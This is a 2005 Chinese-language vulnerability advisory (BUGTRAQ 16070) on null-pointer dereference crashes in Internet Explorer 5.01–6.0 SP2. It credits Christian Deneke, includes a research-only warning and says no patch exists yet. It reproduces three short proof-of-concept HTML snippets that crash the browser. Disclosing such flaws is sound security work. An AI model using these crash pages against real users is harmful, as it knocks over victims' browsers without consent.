发布日期：2005-12-27
更新日期：2005-12-27

受影响系统：

Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01

描述：

---

BUGTRAQ  ID: 16070

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer中存在多个空指针引用错误，导致在解析特制的HTML页面时会导致浏览器崩溃。

<*来源：Christian Deneke （bugtraq@deneke.biz）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113570518509599&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=113570601920897&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=113570689230863&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Crash 1:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Crash 2:
> <acronym><dd><h5><applet></caption></applet><li></h1>

Crash 3:
> <table datasrc=".">

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：3802
严重程度：0（网友投票）